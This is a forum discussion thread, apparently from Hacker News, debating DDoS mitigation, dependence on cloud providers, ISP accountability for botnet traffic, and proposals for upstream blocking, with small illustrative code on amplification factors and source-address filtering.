
I think the fact that large cloud providers can handle huge DDoS attacks leads to a worse internet in the long run. It forces botnets to up their game, and for websites the only solutions available are to pay Google, Amazon, or Cloudflare a protection tax.

I honestly don't see any other options, but I'd really wish for this to be handled through some community-coordinated list of botnet-infected IPs or something.


What?

Let's go back to username and password. 2FA forces scammers to up their game.

What about password managers? Having separate passwords to every account makes hacking into your accounts much harder and might hurt everyone in the long run.

And don't get me started on end to end encryption. Privacy, long term, will mean the fall of civilization.

Sarcasm aside, I think I understand your point that we shouldn't just delegate the whole effort of preventing attacks to cloud providers, but just as with everything production-grade, the average enterprise just isn't ready to deal with all the upfront cost of running its entire computing solution. And it doesn't end with this type of mitigation and dependency. A similar argument could be made for not using proprietary chip designs made by cloud providers, or any proprietary API solution for that matter. It really is a matter of convenience that a community solution might cover in the future, abstracting away the fundamental building blocks every cloud provider must have (name resolution, network, storage and computing services) to provide such higher-level functions without lock-in. We are just not there yet.


> just as with everything production-grade, the average enterprise just isn't ready to deal with all the upfront cost of running its entire computing solution

That’s not a fair point.

We’re not even trying to make the internet safe. There are zero (0) actions being taken to stop this madness. If you run a large website, you still regularly see attacks from routers compromised 3, 4, 5 years ago. And a few days of smart poking around is still enough, to this day, to find enough open DNS resolvers to launch >500Gbps attacks with one or two computers.

Why are these threats allowed to still exist?

The only ones attempting something are governments shutting down booters (DDoS-as-a-service platforms). But that’s treating symptoms, not causes.

We will eventually need to do something, or it will be impossible to run a website that can’t be kicked down for free by the next bored skid.

Just like paying protection fees to the mafia was a status quo, this also is just that. A status quo, not an inevitability.

The solution is to finally hold accountable attack origins (ISPs, mostly), so that monitoring their egress becomes something they have an incentive to do.


I don't think it's true that zero actions are being taken. When new vectors for amplification attacks are found, they get patched - you can't do NTP amplification attacks on modern NTP servers anymore, for example. But it takes a long time for the entire world to upgrade, and it only takes a handful of open vulnerable servers to launch attacks. And in the meantime people are always looking for new amplification vectors.
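
To put rough numbers on why amplification is so attractive (ballpark factors from public DDoS advisories; treat them as illustrations, not exact figures):

    # back-of-the-envelope: bytes reflected per byte sent
    vectors = {
        "DNS (open resolver)": 50,     # commonly cited as ~28-54x
        "NTP (monlist)": 556,          # the now-mostly-patched vector
        "memcached (UDP)": 10000,      # infamously even higher in practice
    }
    uplink_mbps = 100  # attacker's own modest uplink
    for name, factor in vectors.items():
        print(f"{name}: {uplink_mbps} Mbps in -> ~{uplink_mbps * factor / 1000:.0f} Gbps out")

One modest uplink plus a pool of unpatched reflectors is how you get to the >500Gbps figure mentioned above.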

> The solution is to finally hold accountable attack origins (ISPs, mostly), so that monitoring their egress becomes something they have an incentive to do.

Be careful what you wish for. The sort of centralized C&C infrastructure and "list of bad actors everybody has to de-peer" that you would need to do this effectively would be a wonderful juicy target for governments to go, "hey, add [this site we don't like] to the list, or go to prison".


> "hey, add [this site we don't like] to the list, or go to prison".

Aren't there already a dozen or so such lists? I don't see how one more list really increases the risk.

You can make the list public - most of the bad actors are obsolete, compromised equipment whose owners are unaware of the problem. Once the list is public, it's pretty easy to detect anyone trying to abuse the list as a tool of censorship.


IP reputation is already a thing. And plenty enough ASNs are well-known for willfully hosting C2 servers and spam, DoS, etc sources…


Traditionally, a botnet can be comprised (at least largely) of actual consumer devices unknowingly making requests on their owners' behalf. This can cover hundreds of unrelated ISPs as the "origin" and is effectively indistinguishable from organic traffic to a popular destination. "Accountability" is not simple here.


> Traditionally, a botnet can be comprised (at least largely) of actual consumer devices unknowingly making requests on their owners' behalf.

And I do count that in.

Just because a user is the source of an attack unknowingly doesn’t make it right.

What would make it right is for there to be a more generalized remote blackholing system in place.

i.e. my site runs on an IP, is able to tell my ISP to reject traffic to it from $sources, and my ISP can send that request to the source ISP.

And if it makes my site unavailable to that other ISP because of CGNAT and 0 oversight, tough luck. Guess their support is getting calls so maybe they start monitoring obviously abusive egress spikes per-destination.


I like the irony of saying there are zero actions being taken in response to a blog post that documents actions taken against specific CVEs.


These blog posts document the attack. Documenting it and acting on it are different.

There’s no practical action being taken besides « use our products cause we can tank it for you » here.

The mitigations listed are better than nothing, but the fact that every skid out there can hire a botnet of a few thousand compromised machines (like here) and send you a few million rps (say this protocol attack allowed a 100x higher-than-average impact) is more than enough to kill the infra of 99.99% of websites. No questions asked.


>There are zero (0) actions being taken to stop this madness. If you run a large website, you still regularly see attacks from routers compromised 3, 4, 5 years ago

Yes, you're 100% correct. Back in the day, when the main botnet activity was spam, if you were infected and started sending TBs of spam, the ISP would first block your outgoing SMTP. If they kept getting complaints, in a week or two they'd cut you off.

I remember 30 years ago, when most people were on dialup, I was fortunate enough to have 128 kbit/s SDSL. As a relatively clueless kid I decided to portscan an IP range belonging to a mobile service company. A few days later my dad got a phone call saying their IDS flagged it and "don't do it or we'll cancel your service". For a port scan of a few public IPs, no less!

ISPs could definitely put a stop to 99% of these botnets, but until they see some ROI, why would they bother?


But that's exactly the problem: it shouldn't require an enterprise-grade tool just to host a simple website on the internet. We've lost something due to our inability to stop attacks at the source and our heavy overreliance on massive cloud providers to do it for us.

2FA and password managers didn't make us heavily reliant on massive companies.


Yes, but if these cloud providers didn't exist, eventually there'd be botnets that no site could protect against, rather than the status quo of at least some sites being able to resist them. The idea that the existence of cloud providers that can soak up a lot of traffic is making things worse by causing botnets to get more powerful just seems silly.


you don't need enterprise grade tools just to host a simple website. however, if your simple site ever gains enough traction to come under an attack, especially like this, you'll never survive. you can just accept that your service will not survive the attack and shut it down until the attackers decide it's mission accomplished and stop. you can then hope they don't notice when you bring it back. no simple site will be able to afford what's required to stay up through these attacks.

i'm not saying i like having to put the majority behind the services of 2 or 3 companies, but if you ever get shut down from some DDOS, you'll understand why people think they need to.


It won’t survive - until a day or so later you’ve migrated to one of the large providers who provide the protection.


A similar analogy can be made with westward expansion in the continental US.

Back then, you got a piece of land and really could do what you wanted with it. Build a business, farm, etc. Some government taxes, but nothing crazy. But you had to deal with criminals, lack of access to medical care, and lack of education.

Now to do the same, you have a slew of building codes, regulations, and zoning laws, and are basically forced to have municipal services. Higher taxes to pay for the roads, police force, firefighters, education services, etc.

However, home owners can still just have an egg or vegetable stand at the end of their driveway. It won’t be the same as having a storefront in town, but it’s still doable without the overhead.

Similarly, as the internet matures, we’re going to see more and more overhead to sustain a “basic” business.

But you can still have a personal blog run in your closet, for lower-level traffic.

The analogy isn’t perfect, but unfortunately as threat actors’ budgets increase, so too does the quality/sophistication of their attacks. If it were cheap to defend against some of the more costly attacks, they would find a different vector.

The answer, to me, is some tangential technology that is some mix of federated or decentralized. Not in a crypto bro sense, but just some tech whose fundamental design solves the inherent problem with how our web is built today.

Then threat actors will find another way, rinse and repeat…


> home owners can still just have an egg or vegetable stand at the end of their driveway

No you can't. That is illegal without a "cottage food" license, training, and labeling in most of the US.

https://www.pickyourown.org/CottageFoodLawsByState.htm


Child-run lemonade stands are technically illegal in most states (some have actually carved out exemptions for them because of overzealous policing).

Garage sales often have a specific carve-out, also, and limitations on the number of times per year, etc.

In most areas nobody cares at all until it becomes a nuisance somehow.


Selectively enforced laws are the worst kind of law.


I've always thought it would be interesting to allow, as a defense against a violation of a law, proof that the law is regularly violated without consequence.

Because selectively enforced laws are just another way of saying you have a king at some level, the person who decides to enforce or not.


Selective prosecution is a defense under the Equal Protection clause of the Constitution.

However, the Supreme Court has left the prescribed remedy intentionally vague since 1996, which in turn makes the claims themselves less likely to be raised, and less likely to succeed.

https://wlr.law.wisc.edu/wp-content/uploads/sites/1263/2022/...


You have some control over this as an ordinary citizen. Next time you're on a jury for a lemonade stand violation, nullify.


Has a lemonade stand violation ever resulted in a jury trial in the US? I'm skeptical. In places that enforce those rules, usually what happens is that the cops tell the parent it isn't allowed, the kid shuts it down and there's no fine.


Or it turns into a giant PR disaster for the cops.


Don't tell that to the GDPR defenders.


I am a gdpr defender. I would like stricter enforcement.


Okay but does that mean anything regarding the parent commentor's analogy or the article?


20 years ago, if a blog or website ended up on slashdot/digg/whatever, there was a good chance it was going down. Scalable websites are a commodity today.


That goes both ways. What was the price then to get a botnet with 10k nodes making 1k requests / second? What is the price today?


For the website or for the use of the botnet?


For the use of the botnet...


Sure, it's no doubt an arms race. The prevalence of websites going down due to scaling issues feels like an order of magnitude less than it was 20 years ago, though. Purely anecdotal, with no real data to back that up.


Because the majority of sites run on/behind:

- AWS

- Cloudflare

- Azure

- GCP

- Great Firewall of China

Maybe there was some truth about "the world market for maybe five computers", after all...


Sure, but I fail to see how that invalidates my point.


What I am saying is that we are getting "scalable websites" today individually, but it has cost us overall resiliency because most of us all are hiding behind the big providers. I am not so sure if this is a good trade-off.


> 2FA and password managers didn't make us heavily reliant on massive companies.

Retool: https://arstechnica.com/security/2023/09/how-google-authenti...

Lastpass: https://news.ycombinator.com/item?id=34516275


If Google Authenticator goes away, people will still be able to use 2FA (I for one use Aegis, it's available on F-droid and does everything I need, including encrypted backups)

If Lastpass goes away, people will still be able to use keepass or any of the large number of open source password managers, some of them even with browser integrations.

If I have a website that is frequently attacked by botnets and Cloudflare goes away, what can I use to replace it?


I am sorry, but if your password manager goes away and you have no disaster recovery scenario planned, you might not be able to just move to a competitor:

https://news.ycombinator.com/item?id=31652650

My response was to illustrate how insidious big companies are.

Of course nothing compares to the backbone of the web going down. If AWS North Virginia suffers widespread downtime to all its availability zones, much of the web will just go dark, no question about it.


2FA, I’m not sure.

But Lastpass doesn’t represent the whole of password managers. Storing your passwords in an online service is a really silly thing to do (for passwords that matter at least). Use something local like keepass.


Hope you plan ahead for a house fire with a 3-2-1 approach to backups. Maintaining always-on off-site storage is expensive unless you resort to cloud solutions like OneDrive or Dropbox, but then you're back to the problem of having your passwords in the cloud, even if encrypted.

Not using cloud is just very expensive and time consuming for the average user.


Passwords are small enough that you can make physical backups easily.


Honest question, because it is interesting and might change how I approach backing up my passwords: how would you go about keeping that physical copy updated?

What I think would make this approach hard is that you would have to ponder, at creation time, whether a newly created account is important, in order to know if you should update the off-site physical copy of your most important passwords. (I say this because backing up everything while avoiding the cloud entirely is just not viable, having to update this physical backup for each new account. I am currently at over 400 logins in my pw manager; 2 years ago it was half as many.)

I think having your passwords encrypted with a high-enough-entropy master password and a quantum-resistant encryption algorithm, plus an off-site physical backup of your cloud account credentials, is enough for anyone not publicly exposed, like a politician or someone extremely wealthy, though I would be skeptical that even these people go to such lengths to protect their online accounts.


The lesson is not to "avoid" the cloud, but to not be "dependent" on it. Doubly so if the service provided is one that keeps you locked in and cannot be ported over.

So yes, I feel comfortable with my strategy of having backups on Blu-ray disks + S3. If AWS goes down or decides to jack up their prices to something unacceptable, I will take the physical copies and move them to one of the dozen other S3-compatible alternatives. I am not dependent on AWS.

But I am not interested in using Google Authenticator or Lastpass because that would mean that I am at their mercy.


LastPass is an issue - but even LastPass would let you export/print the passwords. So no hard dependency there*. Google Authenticator recently did something similar with QR codes.

* though OTP seeds don’t print, and you can’t export/print attachments. I don’t recommend LastPass for these and many other reasons.


With two USB sticks it’s not that much work to take one with a fresh backup to my mom’s when I visit and take the other one back and update that backup. At worst I lose one or two logins.


It doesn’t take enterprise grade tools to host a website.

It does take enterprise grade tools to defend against the largest DDoS ever attempted.

Those are not the same thing. And those DDoSes are often aimed at things besides an HTTPS endpoint.


There should be a protocol to block traffic at the upstream provider. So if someone at 1.2.3.4 sends lots of traffic at you, you send a special packet to 1.2.3.4, and all upstream providers (including the provider that serves 1.2.0.0/16) that see this packet block traffic from that IP address directed at you. Of course, the packet should allow blocking not only a single address but a whole network, for example 1.2.0.0/16.
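
To sketch the idea (everything here - the handler names, the challenge handshake, the table layout - is invented for illustration, not a worked-out protocol), each router on the path could keep a small table like:

    import secrets, time

    BLOCK_TTL = 3600   # a block expires on its own after an hour
    pending = {}       # token -> (victim, source), awaiting confirmation
    blocked = {}       # (source, victim) -> expiry timestamp

    def on_reject(victim, source, send):
        # challenge the claimed victim first, so a spoofed "reject"
        # can't blackhole traffic on someone else's behalf
        token = secrets.token_hex(8)
        pending[token] = (victim, source)
        send(victim, ("confirm?", token))  # send() stands in for emitting a packet

    def on_confirm(claimed_victim, token):
        entry = pending.pop(token, None)
        if entry and entry[0] == claimed_victim:
            victim, source = entry
            blocked[(source, victim)] = time.time() + BLOCK_TTL

    def should_forward(source, dest):
        # drop only traffic toward the victim that asked; everything else flows
        return blocked.get((source, dest), 0) < time.time()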

But ISPs do not want to adopt such a protocol.


So I can deny service to your site with a single packet, instead of having to bother with establishing a whole botnet? The current botnet customers would be the first to advocate for this new protocol!


Simple! To prevent it being abused easily you could make it so you would need to send a high number of those packets for a sustained period in order to activate the block.


There is already an RFC we could apply: just implement forced RFC 3514 compliance and filter any packets with the evil bit set.

https://datatracker.ietf.org/doc/html/rfc3514


And there could be a short time limit on that block, perhaps one hour, but even 60 seconds would be enough to completely flip the script on a DDoS.


You can only block access to your own IP address, so you can ban someone from sending packets to you but not to anyone else. My proposal is well thought out and doesn't require any lists like Spamhaus's that have vague policies for inclusion and charge money for removal. My proposal doesn't have any potential for misuse.


Sorry, this is not well thought out and certainly has potential for abuse. This is on IP and not domain? What is the signing authority and cryptography mechanism preventing a spoofed request?


When you send a "reject" packet, the intermediate routers send back a confirmation code. You must send this code back to them to confirm that the "reject" packet comes from your IP address. No cryptography or signing required.


I don't think you understand how networking operates at a packet level.


How can it protect from... botnets, where there are tens of thousands "someones"?


You can only ban packets coming to your own IP. A botnet can only ban packets coming to its own IP addresses.


It's not very hard to send packets with a fake source IP, especially if you don't care about the reply.


Seems easy enough to require (i.e. regulate) end-customer ISPs to drop any traffic with a source IP that isn't assigned to the modem it's coming from. This would at least prevent spoofing from e.g. compromised residential IoT devices. Are they not already doing that filtering? Is there any legitimate use-case to allow that kind of traffic?
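
The check itself is trivial - this is essentially BCP 38 / source address validation. A sketch, with invented port names and prefix assignments:

    import ipaddress

    # the prefix the ISP assigned to each customer port (made-up data)
    assigned = {"port-17": ipaddress.ip_network("203.0.113.0/29")}

    def egress_ok(port: str, src_ip: str) -> bool:
        prefix = assigned.get(port)
        return prefix is not None and ipaddress.ip_address(src_ip) in prefix

    print(egress_ok("port-17", "203.0.113.4"))   # True: source matches assignment
    print(egress_ok("port-17", "198.51.100.9"))  # False: spoofed, drop it

The hard part isn't the filter; it's getting every last access network to actually deploy it.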


Someone has to go and add the filtering. Nowadays (or maybe since ten years ago) most ISPs have the filter, but not the last 1% (or maybe 0.01%).


The routers can send back a confirmation token to confirm the origin address.


First of all, there is no way this works reliably for anything but the first hop. There is no way for a router to send a packet to you in a way where you can reply to that router unless you are connected directly to it, unless all ISP routers start being assigned public IP addresses. Additionally, there are normally many paths between you and your attacker, and there is no guarantee that packets you send will take the same path as the packets you were receiving. Especially as the routing rules get modified by your successful blocking requests.

That also means that every router now has to maintain a connection table to keep track of all of the pending confirmations, and to periodically check that table for expirations so it can clean it up. Maybe not that bad for a local router, but this is completely unworkable for routers handling larger parts of the internet.

And of course, anyone who has a tap into that level can trivially spoof all of the correct replies so it's still not a secure mechanism.


You can deny access only to your own IP, not to anyone else's.


IP addresses can be spoofed. So you’d need some kind of handshake to verify you are the owner of that IP. Which is going to be tough to complete if your network is completely saturated from the DDoS in progress.

I do think your idea has merit though. But it’s still a long way from being a well thought-out solution.


How do you verify the source address of the packet is legit?


The router can send back a confirmation code and you must send it back to confirm that request comes from your IP.

Also, on well-behaved networks that do not allow spoofing IP addresses, this check can be omitted.


> The router can send back a confirmation code and you must send it back to confirm that request comes from your IP.

Ideally with the token packet being larger than the initial packet, so it can easily be abused for a reflection attack... ;-)

> Also, on well-behaved networks that do not allow spoofing IP addresses, this check can be omitted.

This is already not true for most networks, and in your case it would have to be true for all intermediate networks, which is just impossible.

In another post you suggest this should also allow blocking entire networks; how do you prevent abuse of that?

Your suggestion is anything but well thought out; it's a pipe dream for a perfect world, but if we lived in one, we wouldn't have DDoS attacks in the first place.


Yeah, we should invent secure communication channels and crypto keys first...


This proposal only works if the packets are readable by every intermediate router. Or are you suggesting that you establish a TLS session with every router between you and the attacker?


What you say already exists, hell, you can use BGP to distribute ACLs

But it costs space in the routing tables, and that means replacing routers earlier. It's no wonder, especially if you multiply it by a thousand customers.

"block all traffic from outside from this IP" is significantly easier than "block all traffic from outside from this IP to this client". And you need to do it per ISP client, else it is ripe for abuse.

And don't forget a lot of the traffic will come from "cloud" itself.


> What you say already exists, hell, you can use BGP to distribute ACLs

But don't you need to own an AS for that?

> But it costs space in the routing tables

Not implementing my proposal leaves critical infrastructure unprotected from foreign attacks. Make larger routing tables. Also, instead of blocking single IPs one can block /8 or /16 subnets.


> Make larger routing tables.

Brilliant! Why didn’t we think of that?!? MOAR TCAMS!!!


If Cloudflare can do this on commodity hardware (stop attacks and block thousands of IPs), then router manufacturers who have custom hardware can do much more.

Also, in Russia, for example, there is DPI and recording of all Internet traffic, and if that is possible in Russia, then the West can probably do 10x more. Simply adding a blacklist on routers seems like an easy task compared to DPI.


This could be done on a paid basis. For example, for $1/month a customer gets the right to insert 1000 records (blocking up to 1000 networks or IPs) into a blacklist on all Tier-1 ISPs. For $100/mo you can withstand an attack from 100,000 IPs, which is more than enough, and Cloudflare goes bankrupt.


I just imagined this: ISPs could make an isp.com?target=yourwebsite.org/fromisp [slow] redirecting URL. If you receive unusual amounts of requests from the ISP, you redirect them through their website.

They can then ignore it until their server melts (which takes care of the problem) or take honorable action if one of their customers is compromised. The S stands for service after all.


It appears you don’t understand DDoS at all. There aren’t humans sitting behind browsers or scripts using browser automation software. No one cares about, much less respects, your “redirect”, because no one’s reading your response. Most of the time the attacks aren’t even HTTP; they are just packet floods.


> It appears you don’t understand DDoS at all.

I can confirm this. I see web pages talking about redirecting traffic to scrubbing centers.


> Of course, the packet should allow blocking not only a single address but a whole network, for example 1.2.0.0/16.

So, if my neighbour is infected and one of his devices is part of a botnet, I get blocked as well?


Yes. Because blocking several extra users on a bad network that has several infected hosts and does nothing about it is better than being under attack.


Block the whole country, and then I guess you’ll see laws passed requiring IoT providers to start updating at a better clip.


That already effectively happens in a lot of cases.


If the source field in a packet reliably indicated the source of the packet and a given IP was sending you a lot of unwanted traffic, you'd ask their ISP to turn them off and the problem would be solved. Maybe one day BCP38 will be fully deployed and that will work. I also dream of a day where chargen servers are only a memory. Some newer protocols are designed to limit the potential of reflected responses.

Null routing is available in some situations, but of course it's not very specific: hey upstreams (and maybe their upstreams), drop all packets to my specific IP. My understanding is null routing is often done via BGP, so all the things (nice and not) that come with that.

Asking for deeper packet inspection than looking at the destination is asking for router ASICs to change their programming; it's unlikely to happen. Anyway, the distributed nature of DDoS means you'd need hundreds of thousands of rules, and nobody will be willing to add that.

Null routing is effective, but of course it takes your IP offline. Often real traffic can be encouraged to move faster than attack traffic. Otherwise, the only solution is to have more input bandwidth than the attack and suck it up. Content networks are in a great position here: because they deliver a lot of traffic over symmetric connections, they have a lot of spare inbound capacity.
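
For reference, remotely triggered blackholing is standardized enough that RFC 7999 defines a well-known BGP community (65535:666) for exactly this. Conceptually the victim's network announces something like the following to its upstreams (shown as plain data for illustration; the real thing is a BGP UPDATE on an established session):

    # conceptual RTBH announcement -- not a real BGP implementation
    rtbh_announcement = {
        "prefix": "198.51.100.25/32",  # the single IP under attack
        "community": "65535:666",      # RFC 7999 BLACKHOLE: "drop traffic to this"
    }

Upstreams that honor the community discard traffic to that /32 at their own edge, which saves your pipe but, as noted, finishes the attacker's job for that one IP.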


> If the source field in a packet reliably indicated the source of the packet and a given IP was sending you a lot of unwanted traffic, you'd ask their ISP to turn them off and the problem would be solved

No. Your email will go straight into the trash because the ISP is not interested in doing something for people who don't pay them money. Also, even if they cooperate, it will take too much time.

> Null routing is available

Null routing means complying with the criminals' demand (they want the site to become inaccessible).

> it's unlikely to happen

It will very likely happen if there is a serious attack on Western infrastructure: for example, if there is no electricity in a large city for several days, or if hospitals across the country stop working, or something like this. Then the measures will be taken. Of course, while the victims are small non-critical businesses, nobody will care.

> Otherwise, the only solution is to have more input bandwidth than the attack and suck it up. Content networks are in a great position here, because they deliver a lot of traffic over symetric connections, they have a lot of spare inbound capacity.

So until my proposal is implemented the only solution is to pay protection money to unnecessary middlemen like Cloudflare.


Do you know what the first D in DDoS attack stands for?


I am pretty sure that protocol would be just as abused.


How exactly? You can authenticate the sender by sending a special confirmation token back.


How does one get removed from the block list?

Say some IoT device that half of households own gets compromised and turned into a giant botnet. The news gets out and everyone throws away that device. Now they are still blocked over a threat that doesn't exist anymore... doesn't seem like a good situation for anyone.

I'd imagine that the website owners that want the attack stopped will soon want to figure out how to get traffic back since they need users to pay the bills.

What's to stop someone from just making an app that participates in an attack when connected to public(ish) wifi networks, and participating in attacks long enough to get those all shut off from major sites?

How does this stop entire ISPs from getting shut off when the attackers have managed to cycle through all the IP pools used for NATing connections (e.g. the Comcasts of the world that use CG-NAT to multiplex very large numbers of people onto very small numbers of IPs)?


> How does one get removed from the block list?

We can add an "accept" packet that lifts the ban.

Also, how do you remove yourself from a blacklist when banned by Google or Cloudflare? I guess here you'd use the same method.

> Say some IoT device that half of households own gets compromised and turned into a giant botnet. The news gets out and everyone throws away that device. Now they are still blocked over a threat that doesn't exist anymore... doesn't seem like a good situation for anyone.

Not my problem. Should have thought twice before buying a vulnerable device and helping criminals. As a solution they can buy a new IP address from their ISP.


As much as I half-wish there was something like this, it does sound like email spam blacklists all over again.


Yes, what the OP is saying is related to one of the paradoxes of security/defence, i.e. the fact that the more one increases one's defences (as Google is doing), the more that increase pushes one's adversaries to increase their offensive capabilities. Which is to say that Google playing it safer and safer actually causes their potential adversaries to become stronger and stronger.

You can see those paradoxes at play throughout the corporate world, and especially when it comes to actual combat/war (to which these DDoSes might actually be connected). For example, the fact that Israel was relatively successful in implementing its Iron Dome shield only incentivised its adversaries to get hold of even more rockets, so that the sheer number of rockets alone would be able to overwhelm said Iron Dome. That's how Hamas got to firing ~4,000 rockets in one single day recently; that number was out of their league several years ago when Iron Dome was not yet functional.


It's the opposite: the number of rockets was growing, and hence the Iron Dome was developed. The Israelis saw the writing on the wall and acted accordingly. The laser system will be operational soon, and then it will cost $1 per shot.


Unless it's cloudy outside.


> Let's go back to username and password. 2FA forces scammers to up their game.

Let's do it. It works for the website you're using right now. 2FA was in large part motivated by limiting bot accounts and getting customers' phone numbers.

I can't imagine how much productivity the economy loses every day due to 2FA.


Is this sarcasm? If not, please provide some more details on why you think "2FA was in large part motivated by limiting bot accounts and getting customers' phone numbers". I never used a phone number for 2FA; mostly TOTP. Bots could do that too. I don't see the connection.

>I can't imagine how much productivity the economy loses every day due to 2FA.

Is it really that much? Every few days I have to enter a 6 digit number I generate on a device I have with me all the time. Writing this comment took me as much time as using 2fa for a handful of services for a month.


> Every few days I have to enter a 6 digit number I generate on a device I have with me all the time.

I use more than one service a day, and some infrequently, so about every day I have a minute or two where I try to log in, need to find my phone (it's not predictable when it will ask), and then type the code in. This happens to every person several times a day!

I also now must carry a smart phone with me to participate in society.

But the main drag is that when people lose or break their phones the response is: "just don't do that" and the consequences range from losing your account to calling customer service.

> Mostly TOTP. Bots could do that too. I don't see the connection.

Most people using 2FA do not use TOTP, they use a phone number.

Bots could use TOTP; it's more infrastructure, and it's a proof-of-work function for them to log in.


While I don't take starcraft2wol's theory seriously, there are a bunch of services that have made phone numbers essentially mandatory. They claim this is to "protect your account".

You sign up for a Skype account or Twitter account and decline to give your phone number, instead choosing a different form of 2FA? In my experience your account will be blocked for 'suspicious activity' even if you have literally no activity.


And you still don't take my theory seriously :)


To add, password managers provide great coverage of almost every problem 2FA is supposed to solve, and they improve a workflow your grandma already knows (writing passwords on a sheet). The only difference is Google doesn't get any money when you run a script on your own computer.


> It works for the website you're using right now

It doesn't; you can regularly see people getting their accounts stolen here. This wouldn't be possible (or at least not this trivial) with any competent implementation of 2FA.


> Privacy, long term, will mean the fall of civilization.

I'm curious about your rationalization for this. Lack of privacy will also mean the fall of civilization. Civilization is just doomed to fail at one point or another. All things come to an end.


This was me being sarcastic. Of course we need privacy, not because we have things to hide, but because individuality can only flourish without constant surveillance.

Yes! All things come to an end, and that is why some recent philosophers think Plato was naive to believe society's rot could be minimized or eradicated. This is where negative utilitarianism comes in, where the point of society is not to maximize happiness (and therefore prevent society from collapsing) but to minimize suffering (and therefore provide mechanisms to minimize the damage from transitions between organizational forms when society collapses). I have to refer you to Karl Popper's The Open Society for this, because needless to say this answer is very reductionist.


Ah I just missed the sarcasm. Yeah, and when the sole goal is to minimize suffering, tyranny is introduced.

"Those who would give up essential liberty, to purchase a little temporary safety, deserve neither liberty nor safety."


This discussion is somewhat reminiscent of "Don't hex the water".

https://www.youtube.com/watch?v=Fzhkwyoe5vI


None of your examples are valid, IMO.

Procuring and operating the infrastructure to mitigate this kind of attack costs many, many thousands of dollars, or requires becoming part of the Cloudflare/AWS/Google hive.

Joe Schmo can set up a TOTP server, run keepass/bitwarden and use letsencrypt for free (or another SSL provider for cheap).

The lament from parent is that running a simple blog reliably shouldn't require being inside Cloudflare's castle walls or building your own castle.

---

My personal observation is that simple websites should continue operating on plain HTTP/1!


That's not a valid comparison, since there are various effective decentralized 2FA methods available – unlike for DDoS protection.


Most of them are dynamic IPs. Some of them are infected mobile devices.

What happens when you log an attack from a device that is attacking you from a school or business WiFi network? Block the whole IP forever?

What if the user is on a CGNAT. Are you going to block the edge proxy for that entire ISP?

What if you're getting hit from a residential connection that gets a new rotated IP every couple of weeks? Block whoever gets that IP from now on?

Your solution doesn't stop attacks. It just stops regular users.


> What happens when you log an attack from a device that is attacking you from a school or business WiFi network? Block the whole IP forever?

No, but for a day perhaps.

> What if the user is on a CGNAT. Are you going to block the edge proxy for that entire ISP?

Maybe. If the ISP doesn’t bother doing anything about it (which is THEIR job, not mine as a website operator).

If the ISP can’t be arsed to do their job, why am I supposed to care about them at all?

> What if you're getting hit from a residential connection that gets a new rotated IP every couple of weeks? Block whoever gets that IP from now on?

Same as the CGNAT one. It’s the ISP’s job to handle their misbehaving customers.

If they refuse to do it and get complaints from their other customers that they’re getting blocked, maybe they’ll actually get to it.

> Your solution doesn't stop attacks. It just stops regular users.

No. It puts pressure on the ISPs to finally stop whining loudly when they receive an attack while closing their eyes to any attack originating from their own network.

This is not sustainable.


Trust me when I say that you don't want the ISPs to inspect web traffic. That is not how to solve this. It is costly for the ISP and will drive up costs. It also makes supporting a website impossible. The ISP is assumed by all parties to be impartial. That assumption is required for the internet to be operational. Sure, it might function your way, but it would be impossible to support.

And maybe Facebook and Google are big enough to push around the ISPs, but they are the only ones. Nobody will bat an eyelash if 15,000 Comcast users in Phoenix, AZ can't access your hokey-pokey website. Comcast doesn't care. The users won't blame their ISP. They will blame you, or whoever owns the hokey-pokey website. If you want traffic, you need to be equipped to handle traffic. You are the one with the internet-facing infrastructure.

You are the one blocking traffic. Not the ISP. That is how it should be. The ISP should be impartial. You pay for connectivity. Consider yourself connected. For better or for worse. You are responsible for what you put onto that connection.


> Trust me when I say that you don't want the ISP's to inspect web traffic.

They do already. DPI on port 53 for DNS blocks and SNI inspection are commonplace. So are IP blocks.

> If you want traffic, you need to be equipped to handle traffic. You are the one with the internet facing infrastructure.

Slightly misleading wording here. More accurately, your point is: « you want to run a website? Better have the infra to support traffic spikes comparable to that of a tech giant ». 400M rps would cost an unfathomable amount of money to handle, even just dropping all the packets.

> And maybe Facebook and Google are big enough to push around the ISP's, but they are the only ones. Nobody will bat an eyelash if 15,000 Comcast users in Phoenix AZ can access your hokey-pokey website.

Obviously yes. Too bad it’s better business for everyone to say nothing and just recommend you use their product.


ISPs need to start taking much more responsibility; currently they do not care, or choose not to care to avoid having to deal with upset customers.

The fact that millions of devices, if not more, can continue to access the internet regardless of how long they have been compromised is just crazy. I get that it puts more responsibility on end users to secure their devices, if they otherwise run the risk of getting thrown off the internet, but I currently fail to see other options. Our device security still isn't good enough that we can just use them with reckless abandon.

Any "solution" that attempts to fix the problem of increasing DDoS attacks and their damage that doesn't address the issue of compromised devices being allowed to roam free on the internet is a band aid at best.

And I can almost hear people complain that I'm arguing to throw compromised IoT, SCADA and monitoring devices off the internet, and yes, I am. None of these things have any business being exposed to the public internet anyway.


Either the ISPs are common carriers that follow some sort of basic rules, or they try to make people happy and end up stepping all over people randomly.

Currently there are zero rules (outside of an ISP's ToS, maybe) that forbid what you're talking about. Pretty much anywhere, I think? Unless you know of a law against having an infected or out-of-date computer connected to the internet?

There really is no way to have both. In the current situation, they generally only deal with problem cases that get reported to them. And I doubt anyone is going to bother doing so for the 20k machines in this attack.


It is not an ISP's job to analyze traffic patterns and attempt to stop the bad ones. That's like saying it's the job of the road crews to stop speeders.


So who else? My proposal would be to have companies like Google, Microsoft, Amazon, and hosting providers be able to report sources of DDoS attacks to the ISPs, who can then identify the customer and let them know that they have a week to fix the issue or lose connectivity.


That is terrifying.

Let Google, Amazon, and Apple decide who gets to use the internet and who gets put into a list.

That is way worse than giving Google the W3C. That is literally just handing them the internet and making everybody else on it subservient to Google.


Or that it's the ISP's job to cut off accounts that are downloading copyrighted works, or hashing cryptocurrency without paying taxes, etc.

It would be nice if the cell phone provider could send a text message reporting the problem. But how to distinguish it from spam?


> > What happens when you log an attack from a device that is attacking you from a school or business WiFi network? Block the whole IP forever?

> No, but for a day perhaps.

Then that's also a DDoS attack vector.


The idea clearly needs some work.

But, a slight defense of it—the really big providers can already sink a massive DDoS anyway. So, this is just a scheme to help little websites. It doesn’t really matter if a school, or even a cellphone network, can’t access my little website for an afternoon.

You’d have to decide if you want to send the block request. If you are hosting your personal blog, you’ll probably go for it regardless. If you are providing a small service; hosting git for a couple friends or whatever, you’ll probably block with some discretion.


The only answer is publicly-resourced protection and it's not that weird when you think about it. My apartment has a basic lock that any locksmith can undo and I'm safe because of my community and government protection (police, mental healthcare, justice system, etc...). Seems like the same logic should apply to my website or other digital property.


